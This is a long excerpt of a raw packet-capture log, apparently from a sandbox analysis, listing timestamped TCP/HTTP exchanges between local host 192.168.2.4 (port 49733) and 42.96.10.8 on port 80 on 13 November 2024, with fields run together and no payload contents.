                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446799040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446832895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446866989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446876049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446876049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446902037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446940899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.446952105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.447099924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.451919079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.451955080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.451989889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.452416897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.561989069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.562048912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.658958912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.659004927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.659054995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.659064054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.659101963 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.659137011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.659173012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.659184933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.659212112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.659347057 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.659786940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.659818888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.659846067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.659933090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.659986973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.660021067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.660042048 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.660124063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.660413027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.660448074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.660497904 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.660504103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.660538912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.660574913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.660618067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.661391973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.661427021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.661437988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.661483049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.661516905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.661537886 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.661552906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.661607027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.662295103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.717992067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.718044996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.718045950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.774502993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.871656895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.871728897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.871778011 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.871786118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.871822119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.871856928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.871864080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.871891975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.871927977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.871942043 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.871962070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.871998072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.872014999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.872037888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.872086048 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.872528076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.872581959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.872617960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.872631073 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.872652054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.872687101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.872734070 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.873169899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.873220921 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.873224974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.873279095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.873312950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.873325109 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.873349905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.873383045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.873402119 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.873419046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.873485088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.874183893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.874237061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.874270916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.874281883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.874305010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.874341011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.874362946 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.961829901 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.987426043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.987473011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.987523079 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.987530947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.987569094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.987603903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.987606049 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.987642050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.987675905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.987690926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.987711906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.987746000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.987751961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.987782001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.987818003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.987828016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.988075018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.988111019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.988181114 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.988251925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.988287926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.988301039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.988323927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.988358974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:15.988369942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.071180105 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.085515022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.085585117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.085621119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.085634947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.085655928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.085691929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.085704088 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.085727930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.085764885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.085768938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.085813046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.085856915 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.086333990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.086375952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.086422920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.102536917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.102569103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.102613926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.102675915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.102711916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.102757931 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.102766991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.102799892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.102833033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.102844000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.102874041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.102910042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.102919102 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.102946043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.102982044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.102988005 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.103300095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.103348017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.103363991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.103399992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.103444099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.103503942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.103559017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.103606939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.103610992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.103645086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.103682041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.103702068 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.104013920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.104059935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.104119062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.202840090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.202884912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.202991962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.203010082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.203027010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.203042984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.203054905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.203061104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.203087091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.203129053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.203146935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.203161955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.203176022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.203197002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.203491926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.203526974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.203561068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.203568935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.218478918 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.218514919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.218534946 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.218570948 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.218605995 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.218622923 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.218641996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.218678951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.218692064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.218714952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.218759060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.218763113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.218796015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.218831062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.218837023 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.218916893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.218950033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.218964100 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.218985081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.219022036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.219158888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.219196081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.219230890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.219243050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.219268084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.219325066 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.219583988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.219620943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.219654083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.219666958 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.274307966 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.316772938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.316818953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.316869974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.316875935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.316914082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.316950083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.316960096 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.316987038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.317022085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.317032099 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.317058086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.317092896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.317096949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.317130089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.317167044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.317172050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.317389011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.317435980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335351944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335431099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335470915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335475922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335505962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335541964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335547924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335597038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335640907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335664988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335700035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335733891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335750103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335772038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335807085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335815907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335843086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335877895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335884094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335912943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335947037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.335963964 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.336031914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.336069107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.336071968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.336731911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.336766958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.336777925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.336802959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.336862087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.336961031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.383683920 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.432542086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.432588100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.432621956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.432640076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.432657003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.432693005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.432708979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.432750940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.432789087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.432802916 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.432818890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.432852030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.432868004 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.432888985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.432923079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.432929993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.432960987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.433002949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451373100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451410055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451451063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451467991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:16.451503038 CET804973342.96.10.8192.168.2.4
